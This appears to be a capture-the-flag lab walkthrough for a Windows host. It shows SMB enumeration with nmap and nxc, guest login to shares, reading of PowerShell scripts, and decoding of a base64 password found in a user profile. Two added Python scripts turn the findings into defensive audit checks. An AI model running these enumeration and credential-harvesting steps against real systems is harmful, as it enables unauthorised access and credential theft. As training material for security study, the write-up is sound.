SMB
Nmap discovered a Windows SMB server (NetBIOS session service and microsoft-ds) on ports 139 and 445 of host 192.168.225.152.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/compromised]
└─$ nmap --script smb-vuln* -sV -p139,445 $IP
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-28 20:02 CEST
Nmap scan report for 192.168.225.152
Host is up (0.021s latency).
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.24 seconds
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/compromised]
└─$ nmap --script smb-enum-shares -sV -p139,445 $IP
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-28 20:02 CEST
Nmap scan report for 192.168.225.152
Host is up (0.022s latency).
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.28 seconds
Share mapping failed.
Null Session
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/compromised]
└─$ nxc smb $IP -u '' -p '' --shares --interfaces
SMB 192.168.225.152 445 COMPROMISED [*] Windows 10 / Server 2019 Build 17763 x64 (name:COMPROMISED) (domain:compromised) (signing:False) (SMBv1:False)
SMB 192.168.225.152 445 COMPROMISED [-] compromised\: STATUS_ACCESS_DENIED
SMB 192.168.225.152 445 COMPROMISED [-] Error enumerating shares: Error occurs while reading from remote(104)
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/compromised]
└─$ nxc smb $IP -u 'blah' -p blah --shares --interfaces
SMB 192.168.225.152 445 COMPROMISED [*] Windows 10 / Server 2019 Build 17763 x64 (name:COMPROMISED) (domain:compromised) (signing:False) (SMBv1:False)
SMB 192.168.225.152 445 COMPROMISED [+] compromised\blah:blah (Guest)
SMB 192.168.225.152 445 COMPROMISED [*] Enumerated shares
SMB 192.168.225.152 445 COMPROMISED Share Permissions Remark
SMB 192.168.225.152 445 COMPROMISED ----- ----------- ------
SMB 192.168.225.152 445 COMPROMISED ADMIN$ Remote Admin
SMB 192.168.225.152 445 COMPROMISED C$ Default share
SMB 192.168.225.152 445 COMPROMISED IPC$ READ Remote IPC
SMB 192.168.225.152 445 COMPROMISED Scripts$ READ
SMB 192.168.225.152 445 COMPROMISED Users$ READ
While the target SMB server does not allow anonymous (null-session) access, it does allow guest access. The guest account has read access to the following shares:
IPC$
Scripts$
Users$
Read access to the IPC$ share means that RID cycling can be conducted to enumerate users.
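The nxc output above is the evidence for the guest-access finding, and it carries more than the share list: the banner line also records that signing is not required and that SMBv1 is off. As an added example (not part of the original write-up and not nxc's own code), the following Python script parses that output format and turns it into audit findings, so the same check can be run over nxc results for many hosts. The sample input is the page's own nxc lines, embedded as a constructed string; the finding wording is this example's own.

```python
import re

# Constructed sample: the nxc lines from the guest-access enumeration above,
# copied as they appear (whitespace collapsed; real nxc output is column-aligned,
# which the whitespace-based parsing below handles the same way).
NXC_OUTPUT = """\
SMB 192.168.225.152 445 COMPROMISED [*] Windows 10 / Server 2019 Build 17763 x64 (name:COMPROMISED) (domain:compromised) (signing:False) (SMBv1:False)
SMB 192.168.225.152 445 COMPROMISED [+] compromised\\blah:blah (Guest)
SMB 192.168.225.152 445 COMPROMISED [*] Enumerated shares
SMB 192.168.225.152 445 COMPROMISED Share Permissions Remark
SMB 192.168.225.152 445 COMPROMISED ----- ----------- ------
SMB 192.168.225.152 445 COMPROMISED ADMIN$ Remote Admin
SMB 192.168.225.152 445 COMPROMISED C$ Default share
SMB 192.168.225.152 445 COMPROMISED IPC$ READ Remote IPC
SMB 192.168.225.152 445 COMPROMISED Scripts$ READ
SMB 192.168.225.152 445 COMPROMISED Users$ READ
"""

PERMISSION_VALUES = {"READ", "WRITE", "READ,WRITE"}
DEFAULT_SHARES = {"ADMIN$", "C$", "IPC$"}   # present on every Windows host


def parse_nxc_smb(text):
    """Parse one host's `nxc smb ... --shares` output into a dict."""
    result = {"host": None, "signing": None, "smbv1": None,
              "guest_auth": False, "shares": []}
    for line in text.splitlines():
        fields = line.split(None, 4)          # SMB, ip, port, hostname, rest
        if len(fields) < 5 or fields[0] != "SMB":
            continue
        result["host"] = fields[1]
        rest = fields[4]
        if rest.startswith("[*]"):            # banner: OS, signing, SMBv1
            m = re.search(r"\(signing:(True|False)\)", rest)
            if m:
                result["signing"] = m.group(1) == "True"
            m = re.search(r"\(SMBv1:(True|False)\)", rest)
            if m:
                result["smbv1"] = m.group(1) == "True"
            continue
        if rest.startswith("[+]"):            # successful authentication
            if rest.rstrip().endswith("(Guest)"):
                result["guest_auth"] = True
            continue
        if rest.startswith("[-]"):            # failures: nothing to record
            continue
        tokens = rest.split()
        if not tokens or tokens[:2] == ["Share", "Permissions"] or tokens[0].startswith("---"):
            continue                          # table header / separator
        if len(tokens) > 1 and tokens[1] in PERMISSION_VALUES:
            perms, remark = tokens[1], " ".join(tokens[2:])
        else:                                 # no access: remark follows the name
            perms, remark = "", " ".join(tokens[1:])
        result["shares"].append({"name": tokens[0], "perms": perms, "remark": remark})
    return result


def readable_shares(result):
    return [s["name"] for s in result["shares"] if "READ" in s["perms"]]


def assess(result):
    """Turn the parsed output into findings a defender would want to act on."""
    findings = []
    if result["signing"] is False:
        findings.append("SMB signing not required")
    if result["smbv1"]:
        findings.append("SMBv1 enabled")
    readable = readable_shares(result)
    if result["guest_auth"]:
        findings.append("guest authentication accepted")
        if readable:
            findings.append("guest-readable shares: " + ", ".join(readable))
        if "IPC$" in readable:
            findings.append("IPC$ readable by guest: account enumeration exposure")
    exposed = [n for n in readable if n not in DEFAULT_SHARES]
    if exposed:
        findings.append("non-default shares readable: " + ", ".join(exposed))
    return findings


if __name__ == "__main__":
    parsed = parse_nxc_smb(NXC_OUTPUT)
    for finding in assess(parsed):
        print(f"[{parsed['host']}] {finding}")
```

Run against the sample, the script reports the disabled signing requirement, the accepted guest logon, the three guest-readable shares, the IPC$ exposure, and the two non-default shares (Scripts$ and Users$) that a low-privilege account can read.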
Scripts$ Share
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/compromised]
└─$ impacket-smbclient blah:blah@$IP
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# use Scripts$
# tree
/defrag.ps1
/fix-printservers.ps1
/install-features.ps1
/purge-temp.ps1
Finished - 0 files and folders
The share contains four PowerShell scripts.
defrag.ps1
# cat defrag.ps1
Optimize-Volume -DriveLetter C -Defrag -Verbose
N/A
fix-printservers.ps1
# cat fix-printservers.ps1
$credential = New-Object System.Management.Automation.PSCredential ('scripting', $password)
$spooler = Get-WmiObject -Class Win32_Service -ComputerName (Read-Host -Prompt 'Server Name') -Credential $credential -Filter "Name='spooler'"
$spooler.stopservice()
$spooler.startservice()
The script restarts the Print Spooler service on a remote server, authenticating as the scripting user with a $password variable that this script never defines, so the value must be set somewhere else. The spooler service has been confirmed to be operating on the target system, and scripting is a valid user.
install-features.ps1
# cat install-features.ps1
Install-WindowsFeature -Name WindowsPowerShellWebAccess -IncludeManagementTools
This script is inconclusive on its own, but it suggests that PowerShell Web Access (PSWA) may be installed on the web server(s).
purge-temp.ps1
# cat purge-temp.ps1
rm "C:\Users\*\Appdata\Local\Temp\*" "c:\Windows\Temp\*" -Recurse -Force -ErrorAction SilentlyContinue
N/A
Users$ Share
# ls
drw-rw-rw- 0 Tue Jun 1 16:59:38 2021 .
drw-rw-rw- 0 Tue Jun 1 16:59:38 2021 ..
drw-rw-rw- 0 Tue Jun 1 16:59:38 2021 .NET v4.5
drw-rw-rw- 0 Tue Jun 1 16:59:37 2021 .NET v4.5 Classic
drw-rw-rw- 0 Tue Jun 1 16:56:44 2021 Administrator
drw-rw-rw- 0 Fri May 28 20:45:50 2021 All Users
drw-rw-rw- 0 Fri May 28 19:47:25 2021 Default
drw-rw-rw- 0 Fri May 28 20:45:50 2021 Default User
-rw-rw-rw- 174 Fri May 28 20:42:37 2021 desktop.ini
drw-rw-rw- 0 Fri May 28 12:53:18 2021 Public
drw-rw-rw- 0 Tue Jul 20 17:21:03 2021 scripting
This appears to be the C:\Users directory.
Credential
# pwd
/scripting/Documents/WindowsPowerShell
# ls
drw-rw-rw- 0 Tue Jun 1 17:00:27 2021 .
drw-rw-rw- 0 Tue Jun 1 17:00:27 2021 ..
-rw-rw-rw- 239 Tue Jun 1 17:00:27 2021 profile.ps1
# cat profile.ps1
$password = ConvertTo-SecureString "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('RgByAGkAZQBuAGQAcwBEAG8AbgB0AEwAZQB0AEYAcgBpAGUAbgBkAHMAQgBhAHMAZQA2ADQAUABhAHMAcwB3AG8AcgBkAHMA')))" -AsPlainText -Force
A credential was identified in /scripting/Documents/WindowsPowerShell/profile.ps1: the scripting user's PowerShell profile sets the $password variable used by fix-printservers.ps1 from a base64-encoded string.
Decoding
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/compromised]
└─$ echo RgByAGkAZQBuAGQAcwBEAG8AbgB0AEwAZQB0AEYAcgBpAGUAbgBkAHMAQgBhAHMAZQA2ADQAUABhAHMAcwB3AG8AcgBkAHMA | base64 -d
FriendsDontLetFriendsBase64Passwords
Password for the scripting account decoded: FriendsDontLetFriendsBase64Passwords
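One detail worth knowing about the decode above: the script calls [System.Text.Encoding]::Unicode, which is UTF-16LE, so the blob decodes to the password with a NUL byte after every character. `base64 -d` prints those NUL bytes and the terminal simply does not render them, which is why the output looks clean. As an added example (not part of the original write-up), the Python script below is the check a defender would run over scripts found on a share: it finds FromBase64String literals, decodes them the way PowerShell would, and flags ConvertTo-SecureString -AsPlainText usage, which is the pattern that put this password on disk in the first place. The sample input embeds the profile.ps1 line from the page plus one constructed, harmless second line; the regex and finding names are this example's own.

```python
import base64
import re

# Constructed sample input: the profile.ps1 line recovered from the Users$ share
# above, followed by one harmless line (an assumption) that the scanner must ignore.
PROFILE_PS1 = r"""$password = ConvertTo-SecureString "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('RgByAGkAZQBuAGQAcwBEAG8AbgB0AEwAZQB0AEYAcgBpAGUAbgBkAHMAQgBhAHMAZQA2ADQAUABhAHMAcwB3AG8AcgBkAHMA')))" -AsPlainText -Force
Set-Location C:\Users\scripting
"""

# Matches the argument of [System.Convert]::FromBase64String('...') or ("...").
B64_LITERAL = re.compile(r"""FromBase64String\(\s*['"]([A-Za-z0-9+/=]+)['"]\s*\)""")


def decode_powershell_b64(blob):
    """Decode a base64 literal the way the script's own decoder would see it."""
    raw = base64.b64decode(blob)
    # [System.Text.Encoding]::Unicode is UTF-16LE, so ASCII text arrives as
    # (char, 0x00) pairs. `base64 -d` in a shell emits those NUL bytes, which
    # a terminal silently hides; decode them explicitly instead.
    if raw and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        return raw.decode("utf-16-le")
    return raw.decode("utf-8", errors="replace")


def scan_script(text):
    """Report base64 literals (decoded) and plaintext SecureString conversions."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for blob in B64_LITERAL.findall(line):
            findings.append({"line": lineno, "kind": "base64-literal",
                             "decoded": decode_powershell_b64(blob)})
        if "ConvertTo-SecureString" in line and "-AsPlainText" in line:
            findings.append({"line": lineno, "kind": "plaintext-securestring",
                             "decoded": None})
    return findings


if __name__ == "__main__":
    for f in scan_script(PROFILE_PS1):
        print(f"line {f['line']}: {f['kind']}", f["decoded"] or "")
```

On the sample the scanner returns two findings for line 1 (the decoded base64 literal and the plaintext SecureString conversion) and nothing for line 2. The UTF-16LE heuristic is deliberately narrow: a blob whose odd bytes are all zero is decoded as UTF-16LE, anything else falls back to UTF-8, so ordinary base64 literals are still shown rather than misread.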
Testing the credential against the target WinRM server.